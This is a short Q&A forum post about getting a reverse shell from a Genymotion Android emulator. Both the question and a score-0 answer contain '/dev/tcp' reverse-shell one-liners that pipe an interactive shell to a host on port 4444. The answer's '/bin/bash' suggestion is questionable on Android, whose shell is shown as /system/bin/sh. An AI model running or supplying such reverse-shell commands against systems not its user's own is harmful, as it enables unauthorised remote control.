# Reverse/Bind shell from Android Device

Tags: android, tcp, sh, reverse-shell

I'm trying to get a reverse shell from Genymotion Android (8.0.0) device.

IP of my local machine: 192.168.178.101

The below command, when executed from my host machine, gives me a shell.

```
rewanth@ubuntu:~$ adb shell "sh -i >& /dev/tcp/192.168.178.101/4444 0>&1"
```

But when I do it directly from the android shell, I get the following error. Why?

```
rewanth@ubuntu:~$ adb shell
vbox86p:/# sh -i >& /dev/tcp/192.168.178.101/4444 0>&1
/system/bin/sh: >&/dev/tcp/192.168.178.101/4444 : illegal file descriptor name
```

Any workaround/different way to get a reverse shell from inside android shell?

Answer (score 0):

Use

```
/bin/bash 1>& /dev/tcp/192.168.178.101/4444 0>&1
```

Instead